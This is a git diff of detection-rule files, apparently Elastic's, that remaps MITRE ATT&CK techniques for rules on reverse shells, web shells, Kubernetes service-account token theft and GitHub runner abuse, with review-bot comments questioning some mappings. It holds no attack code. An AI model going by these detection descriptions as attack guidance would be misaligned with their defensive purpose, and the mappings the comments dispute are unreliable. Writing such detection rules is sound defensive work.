diff --git a/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml b/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml
index 652be9cb05b..67741370170 100644
--- a/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml
+++ b/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend", "kubernetes"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/05"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -145,6 +145,16 @@ id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"
+[[rule.threat.technique]]
+id = "T1609"
+name = "Container Administration Command"
+reference = "https://attack.mitre.org/techniques/T1609/"
+
+[[rule.threat.technique]]
+id = "T1610"
+name = "Deploy Container"
+reference = "https://attack.mitre.org/techniques/T1610/"
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
@@ -153,6 +163,16 @@ reference = "https://attack.mitre.org/tactics/TA0002/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1069"
+name = "Permission Groups Discovery"
+reference = "https://attack.mitre.org/techniques/T1069/"
+
+[[rule.threat.technique]]
+id = "T1087"
+name = "Account Discovery"
+reference = "https://attack.mitre.org/techniques/T1087/"
+
 [[rule.threat.technique]]
 id = "T1613"
 name = "Container and Resource Discovery"
diff --git a/rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml b/rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml
index 95229fe817d..fc91b794a16 100644
--- a/rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml
+++ b/rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend", "kubernetes"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/01/27"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -108,6 +108,11 @@ reference = "https://attack.mitre.org/tactics/TA0002/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1528"
+name = "Steal Application Access Token"
+reference = "https://attack.mitre.org/techniques/T1528/"
+
 [[rule.threat.technique]]
 id = "T1552"
 name = "Unsecured Credentials"
@@ -135,3 +140,21 @@ reference = "https://attack.mitre.org/techniques/T1613/"
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1550"
+name = "Use Alternate Authentication Material"
+reference = "https://attack.mitre.org/techniques/T1550/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1550.001"
+name = "Application Access Token"
+reference = "https://attack.mitre.org/techniques/T1550/001/"
+
+[rule.threat.tactic]
+id = "TA0008"
+name = "Lateral Movement"
+reference = "https://attack.mitre.org/tactics/TA0008/"
diff --git a/rules/cross-platform/execution_git_exploit_cve_2025_48384.toml b/rules/cross-platform/execution_git_exploit_cve_2025_48384.toml
index 0074a431b39..314d1926cab 100644
--- a/rules/cross-platform/execution_git_exploit_cve_2025_48384.toml
+++ b/rules/cross-platform/execution_git_exploit_cve_2025_48384.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/11/12"
 integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/11/12"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -88,12 +88,35 @@ sequence by host.id with maxspan=1m
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Execution"
- id = "TA0002"
- reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
- [[rule.threat.technique]]
- name = "Exploitation for Client Execution"
- id = "T1203"
- reference = "https://attack.mitre.org/techniques/T1203/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[[rule.threat.technique]]
+id = "T1203"
+name = "Exploitation for Client Execution"
+reference = "https://attack.mitre.org/techniques/T1203/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1105"
+name = "Ingress Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1105/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/cross-platform/execution_nodejs_pre_or_post_install_script_execution.toml b/rules/cross-platform/execution_nodejs_pre_or_post_install_script_execution.toml
index 13869c98f9b..22754b0113e 100644
--- a/rules/cross-platform/execution_nodejs_pre_or_post_install_script_execution.to
+++ b/rules/cross-platform/execution_nodejs_pre_or_post_install_script_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/09/18"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/03"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -83,6 +83,11 @@ id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.007"
+name = "JavaScript"
+reference = "https://attack.mitre.org/techniques/T1059/007/"
+
 [[rule.threat.technique]]
 id = "T1204"
 name = "User Execution"
@@ -123,3 +128,21 @@ framework = "MITRE ATT&CK"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1195"
+name = "Supply Chain Compromise"
+reference = "https://attack.mitre.org/techniques/T1195/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1195.001"
+name = "Compromise Software Dependencies and Development Tools"
+reference = "https://attack.mitre.org/techniques/T1195/001/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/cross-platform/execution_openclaw_agent_child_process.toml b/rules/cross-platform/execution_openclaw_agent_child_process.toml
index 919bf598224..c2a5536ac48 100644
--- a/rules/cross-platform/execution_openclaw_agent_child_process.toml
+++ b/rules/cross-platform/execution_openclaw_agent_child_process.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/02/02"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/10"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -83,36 +83,89 @@ process where event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.001"
+name = "PowerShell"
+reference = "https://attack.mitre.org/techniques/T1059/001/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.002"
+name = "AppleScript"
+reference = "https://attack.mitre.org/techniques/T1059/002/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.003"
+name = "Windows Command Shell"
+reference = "https://attack.mitre.org/techniques/T1059/003/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.006"
+name = "Python"
+reference = "https://attack.mitre.org/techniques/T1059/006/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1059.007"
 name = "JavaScript"
 reference = "https://attack.mitre.org/techniques/T1059/007/"
-
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1071"
 name = "Application Layer Protocol"
 reference = "https://attack.mitre.org/techniques/T1071/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1071.001"
 name = "Web Protocols"
 reference = "https://attack.mitre.org/techniques/T1071/001/"
-
+[[rule.threat.technique]]
+id = "T1105"
+name = "Ingress Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1105/"
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1140"
+name = "Deobfuscate/Decode Files or Information"
+reference = "https://attack.mitre.org/techniques/T1140/"
+
+[[rule.threat.technique]]
+id = "T1218"
+name = "System Binary Proxy Execution"
+reference = "https://attack.mitre.org/techniques/T1218/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1218.011"
+name = "Rundll32"
+reference = "https://attack.mitre.org/techniques/T1218/011/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/cross-platform/execution_privileged_container_creation_with_host_reference.toml b/rules/cross-platform/execution_privileged_container_creation_with_host_reference.toml
index 4a04cf04a54..9fecc9c12b1 100644
--- a/rules/cross-platform/execution_privileged_container_creation_with_host_reference.toml
+++ b/rules/cross-platform/execution_privileged_container_creation_with_host_reference.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/11/27"
 integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/11/27"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -127,6 +127,11 @@ id = "T1609"
 name = "Container Administration Command"
 reference = "https://attack.mitre.org/techniques/T1609/"
+[[rule.threat.technique]]
+id = "T1610"
+name = "Deploy Container"
+reference = "https://attack.mitre.org/techniques/T1610/"
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
diff --git a/rules/cross-platform/execution_register_github_actions_runner.toml b/rules/cross-platform/execution_register_github_actions_runner.toml
index bd5c534de51..bd45fce941d 100644
--- a/rules/cross-platform/execution_register_github_actions_runner.toml
+++ b/rules/cross-platform/execution_register_github_actions_runner.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/11/26"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"]
 maturity = "production"
-updated_date = "2025/11/26"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
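Review bot: T1218.011 Rundll32, T1059.001 PowerShell and T1059.003 Windows Command Shell are Windows-only sub-techniques on a cross-platform rule whose hunk header shows a plain `process where event.type == "start" and` query, so they only hold if the child-process list the query matches actually includes rundll32, PowerShell and cmd on Windows hosts; the query is outside the hunk, so please confirm rather than map by platform breadth. The same Rundll32 entry is added to execution_via_github_actions_runner.toml later in this diff and deserves the same check. T1140 is mapped without a sub-technique, which is fine, but a sentence in the rule note saying which decoding child process triggers it would make the three Defense Evasion entries auditable. The T1105 technique is inserted between the T1071.001 sub-technique and `[rule.threat.tactic]` with a blank line removed and none added; the collapsed rendering hides surviving blank lines, so only a formatter run can confirm the spacing is consistent with the other rebuilt blocks.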
@@ -95,32 +95,44 @@ process where event.type == "start" and event.action in ("exec", "exec_event", "
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
-
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1195"
 name = "Supply Chain Compromise"
 reference = "https://attack.mitre.org/techniques/T1195/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1195.002"
 name = "Compromise Software Supply Chain"
 reference = "https://attack.mitre.org/techniques/T1195/002/"
-
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1219"
+name = "Remote Access Tools"
+reference = "https://attack.mitre.org/techniques/T1219/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/cross-platform/execution_revershell_via_shell_cmd.toml b/rules/cross-platform/execution_revershell_via_shell_cmd.toml
index 62a96f31eb4..2ddadb560c6 100644
--- a/rules/cross-platform/execution_revershell_via_shell_cmd.toml
+++ b/rules/cross-platform/execution_revershell_via_shell_cmd.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/01/07"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2024/09/23"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -89,14 +89,26 @@ process where event.type in ("start", "process_started") and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1095"
+name = "Non-Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1095/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml b/rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml
index a9a731ace09..1028f94f30a 100644
--- a/rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml
+++ b/rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/26"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/04/26"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -67,24 +67,41 @@ note = """## Triage and analysis
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1059.007"
 name = "JavaScript"
 reference = "https://attack.mitre.org/techniques/T1059/007/"
-
 [[rule.threat.technique]]
 id = "T1203"
 name = "Exploitation for Client Execution"
 reference = "https://attack.mitre.org/techniques/T1203/"
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1505"
+name = "Server Software Component"
+reference = "https://attack.mitre.org/techniques/T1505/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1505.003"
+name = "Web Shell"
+reference = "https://attack.mitre.org/techniques/T1505/003/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/cross-platform/execution_sap_netweaver_webshell_exec.toml b/rules/cross-platform/execution_sap_netweaver_webshell_exec.toml
index ac4891f7ad4..d2189e589d5 100644
--- a/rules/cross-platform/execution_sap_netweaver_webshell_exec.toml
+++ b/rules/cross-platform/execution_sap_netweaver_webshell_exec.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/26"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/04/26"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
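Review bot: The Execution block on the new side keeps T1059.007 JavaScript as its only scripting sub-technique, yet this rule is about a JSP (JavaServer Pages, i.e. Java) web shell and JSP is not JavaScript; unless the query, which is outside the hunk, matches a JavaScript interpreter being spawned, that entry is a pre-existing mix-up worth fixing while the mapping is being reworked here, because the new T1505.003 Web Shell entry under Persistence is the accurate one and T1203 Exploitation for Client Execution is likewise a client-side technique on what the file name calls a server-side web shell. The sibling hunks for execution_sap_netweaver_webshell_exec.toml and execution_suspicious_java_netcon_childproc.toml carry the same T1059.007 and T1203 lines and may deserve the same look. If the JavaScript mapping is intentional, one sentence in the rule note naming the interpreter would settle it.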
@@ -84,24 +84,74 @@ note = """## Triage and analysis
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.001"
+name = "PowerShell"
+reference = "https://attack.mitre.org/techniques/T1059/001/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.003"
+name = "Windows Command Shell"
+reference = "https://attack.mitre.org/techniques/T1059/003/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.006"
+name = "Python"
+reference = "https://attack.mitre.org/techniques/T1059/006/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1059.007"
 name = "JavaScript"
 reference = "https://attack.mitre.org/techniques/T1059/007/"
-
 [[rule.threat.technique]]
 id = "T1203"
 name = "Exploitation for Client Execution"
 reference = "https://attack.mitre.org/techniques/T1203/"
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1190"
+name = "Exploit Public-Facing Application"
+reference = "https://attack.mitre.org/techniques/T1190/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1505"
+name = "Server Software Component"
+reference = "https://attack.mitre.org/techniques/T1505/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1505.003"
+name = "Web Shell"
+reference = "https://attack.mitre.org/techniques/T1505/003/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/cross-platform/execution_suspicious_java_netcon_childproc.toml b/rules/cross-platform/execution_suspicious_java_netcon_childproc.toml
index 8ca0cdb5a1f..4cbccabc4c9 100644
--- a/rules/cross-platform/execution_suspicious_java_netcon_childproc.toml
+++ b/rules/cross-platform/execution_suspicious_java_netcon_childproc.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/12/10"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/01/27"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -109,24 +109,46 @@ Java Naming and Directory Interface (JNDI) is a Java API that provides naming an
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.006"
+name = "Python"
+reference = "https://attack.mitre.org/techniques/T1059/006/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1059.007"
 name = "JavaScript"
 reference = "https://attack.mitre.org/techniques/T1059/007/"
-
 [[rule.threat.technique]]
 id = "T1203"
 name = "Exploitation for Client Execution"
 reference = "https://attack.mitre.org/techniques/T1203/"
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1190"
+name = "Exploit Public-Facing Application"
+reference = "https://attack.mitre.org/techniques/T1190/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/cross-platform/execution_via_github_actions_runner.toml b/rules/cross-platform/execution_via_github_actions_runner.toml
index 08782e87f48..c82405b97e9 100644
--- a/rules/cross-platform/execution_via_github_actions_runner.toml
+++ b/rules/cross-platform/execution_via_github_actions_runner.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/11/26"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"]
 maturity = "production"
-updated_date = "2025/11/26"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -99,32 +99,79 @@ process where event.type == "start" and event.action in ("exec", "exec_event", "
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.001"
+name = "PowerShell"
+reference = "https://attack.mitre.org/techniques/T1059/001/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.002"
+name = "AppleScript"
+reference = "https://attack.mitre.org/techniques/T1059/002/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.003"
+name = "Windows Command Shell"
+reference = "https://attack.mitre.org/techniques/T1059/003/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.006"
+name = "Python"
+reference = "https://attack.mitre.org/techniques/T1059/006/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.007"
+name = "JavaScript"
+reference = "https://attack.mitre.org/techniques/T1059/007/"
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1195"
 name = "Supply Chain Compromise"
 reference = "https://attack.mitre.org/techniques/T1195/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1195.002"
 name = "Compromise Software Supply Chain"
 reference = "https://attack.mitre.org/techniques/T1195/002/"
-
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1218"
+name = "System Binary Proxy Execution"
+reference = "https://attack.mitre.org/techniques/T1218/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1218.011"
+name = "Rundll32"
+reference = 
"https://attack.mitre.org/techniques/T1218/011/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml b/rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml
index ebd0cb49ce7..f2c133d735b 100644
--- a/rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml
+++ b/rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/11/27"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/11/27"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -115,49 +115,58 @@ not process.env_vars like~ "RUNNER_TRACKING_ID=github_*"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Execution"
- id = "TA0002"
- reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
- [[rule.threat.technique]]
- id = "T1059"
- name = "Command and Scripting Interpreter"
- reference = "https://attack.mitre.org/techniques/T1059/"
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Initial Access"
- id = "TA0001"
- reference = "https://attack.mitre.org/tactics/TA0001/"
+[[rule.threat.technique]]
+id = "T1195"
+name = "Supply Chain Compromise"
+reference = "https://attack.mitre.org/techniques/T1195/"
- [[rule.threat.technique]]
- name = "Supply Chain Compromise"
- id = "T1195"
- reference = "https://attack.mitre.org/techniques/T1195/"
-
- [[rule.threat.technique.subtechnique]]
- name = "Compromise Software Dependencies and Development Tools"
- id = "T1195.001"
- reference = "https://attack.mitre.org/techniques/T1195/001/"
+[[rule.threat.technique.subtechnique]]
+id = "T1195.001"
+name = "Compromise Software Dependencies and Development Tools"
+reference = "https://attack.mitre.org/techniques/T1195/001/"
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Defense Evasion"
- id = "TA0005"
- reference = "https://attack.mitre.org/tactics/TA0005/"
-
- [[rule.threat.technique]]
- name = "Impair Defenses"
- id = "T1562"
- reference = "https://attack.mitre.org/techniques/T1562/"
-
- [[rule.threat.technique.subtechnique]]
- name = "Disable or Modify Tools"
- id = "T1562.001"
- reference = 
"https://attack.mitre.org/techniques/T1562/001/"
+[[rule.threat.technique]]
+id = "T1036"
+name = "Masquerading"
+reference = "https://attack.mitre.org/techniques/T1036/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1036.009"
+name = "Break Process Trees"
+reference = "https://attack.mitre.org/techniques/T1036/009/"
+
+[[rule.threat.technique]]
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1562.001"
+name = "Disable or Modify Tools"
+reference = "https://attack.mitre.org/techniques/T1562/001/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml b/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml
index bfb7916cda2..407eeea5e48 100644
--- a/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml
+++ b/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/12/04"
 integration = ["endpoint", "windows", "auditd_manager", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
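Review bot: The new T1036.009 Break Process Trees entry is the only mapping change in this hunk that is not a reorder, and its fit is loose: the hunk header shows the query keys on `not process.env_vars like~ "RUNNER_TRACKING_ID=github_*"`, i.e. a runner child whose tracking variable has been removed or altered, presumably so the runner's own process bookkeeping no longer accounts for it, whereas T1036.009 describes severing the parent/child lineage itself. If the intent is evasion of the runner's tracking, the T1562.001 Disable or Modify Tools entry kept here already covers it; if the intent really is lineage masquerading, a sentence in the rule's note explaining the tie-in would justify the extra sub-technique, since every sub-technique feeds coverage reporting. The technique-before-tactic reorder in all three blocks is a pure reformat and fine.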
@@ -127,3 +127,77 @@ reference = "https://attack.mitre.org/techniques/T1190/" id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + +[[rule.threat.technique.subtechnique]] +id = 